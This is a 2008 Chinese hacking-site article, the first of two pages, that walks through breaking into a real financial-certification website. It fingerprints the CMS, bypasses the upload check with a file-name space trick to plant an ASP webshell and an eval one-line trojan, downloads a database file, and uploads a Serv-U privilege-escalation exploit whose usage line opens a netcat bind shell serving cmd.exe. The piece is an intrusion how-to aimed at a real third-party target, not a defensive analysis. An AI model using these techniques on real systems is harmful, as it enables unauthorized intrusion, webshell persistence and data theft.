我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 安全防御 | 程序设计 | 系统操作 | 网络技术 | 本站动态 | 业界动态 | 安全公告 | 病毒公告
 
 
您当前的位置:我爱黑客网 -> 黑客攻防 -> 攻防实战 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈 · Exploit
热门文章
· 骇客学堂:简单入侵个..
· 轻松入侵个人免费空间..
· 教你入侵六合彩网拿会..
· 会员QQ重大漏洞
· 无线攻防:破解WEP密钥..
· 手把手教你入侵 win20..
· 怎样不用密码进入Wind..
· 我也做黑客:简单入侵个..
· 黑客入门者如何获取肉..
· 黑客高手必懂基础内容..
· 网吧冲钱从概念到实践..
· 我这样破解万象免费上..
相关文章

· 避其锋芒 Linux操作..
· cookie入侵工具三剑..
· [组图] WAP手机网站入..
· [组图] 多图详解 入侵..
· [图文] 入侵宝典 用S..
· [组图] 入侵也玩双通..
· 手把手教你入侵网站..
· [组图] 王者风范 2分..
· [组图] 菜鸟学黑客 I..
· 入侵中VBS的灵活使用..
查看更多与入侵国际财务管理师服务器(图)相关内容
入侵国际财务管理师服务器(图)
作者:我爱黑客网  来源:http://www.5ihack.com/  发布时间:2008-6-27 10:19:41  发布人:ghostfire

减小字体 增大字体

今天小弟郁闷得无聊就在此献丑了
无意中找到国际财务管理师这个网站
如图
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101942931.jpg’);" src="/article/UploadPic/2008-6/2008627101942931.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
随便用user_reg.asp试探下 结果发现是动力3.51的系统
然后注册了一个用户

screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101943637.jpg’);" src="/article/UploadPic/2008-6/2008627101943637.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>


试着访问下upfile_article.asp如图 可见漏洞是存在的

screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101944621.jpg’);" src="/article/UploadPic/2008-6/2008627101944621.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>


好了我们就用upload_article.asp这个空格漏洞上传页面本地先修改下
action=后面填上要上传的页面如图
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101944130.jpg’);" src="/article/UploadPic/2008-6/2008627101944130.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
我们在前面一个上传文件中选中本地一个rar文件(小点的)
后面那个就选上asp木马 我选的小马
记住后面要填上空格如图
其实就是构造了一个asp空格rar的文件
然后空格的代码1改为0
这样就欺骗上传了
这些都是这个上传工具.htm中的功能
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101945988.jpg’);" src="/article/UploadPic/2008-6/2008627101945988.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
上传完毕是一个空白页子
这时右键v查看源文件 找到上传成功的asp木马路径如图
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101945602.jpg’);" src="/article/UploadPic/2008-6/2008627101945602.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
把后面的路径填到网站地址后面 小马出来了 如图
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101947246.jpg’);" src="/article/UploadPic/2008-6/2008627101947246.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
继续:本来打算小马传上去就完了
因为实在不相信我那点菜技术能拿服务器
继续:
我就往下面里面插入Eval一句话木马了如图
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101947874.jpg’);" src="/article/UploadPic/2008-6/2008627101947874.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
然后本地用海洋2006c端的例子提交 记得按加号
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101947517.jpg’);" src="/article/UploadPic/2008-6/2008627101947517.jpg" onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
狠容易找到了cif文件
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101948866.jpg’);" src="/article/UploadPic/2008-6/2008627101948866.jpg" width=820 onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>
当他把它下载了
继续
把serv-u3.*-6.0所有版本的权限提升漏洞利用程序
by
HaK_BaN QQ:616222
Bug.Center.Team:www.bnso.net
Example: servu.exe "nc.exe -l -p 99 -e cmd.exe"
su.exe传上去
screen.width-461) window.open(’/article/UploadPic/2008-6/2008627101948586.jpg’);" src="/article/UploadPic/2008-6/2008627101948586.jpg" width=820 onload="if(this.width>screen.width-460)this.width=screen.width-460" border=0>

[1] [2]  下一页

查看更多与入侵国际财务管理师服务器(图)相关内容
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      多图详解 入侵知名网站居然这么简单(图)       WAP手机网站入侵:不让上传我偏偏传(图)
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图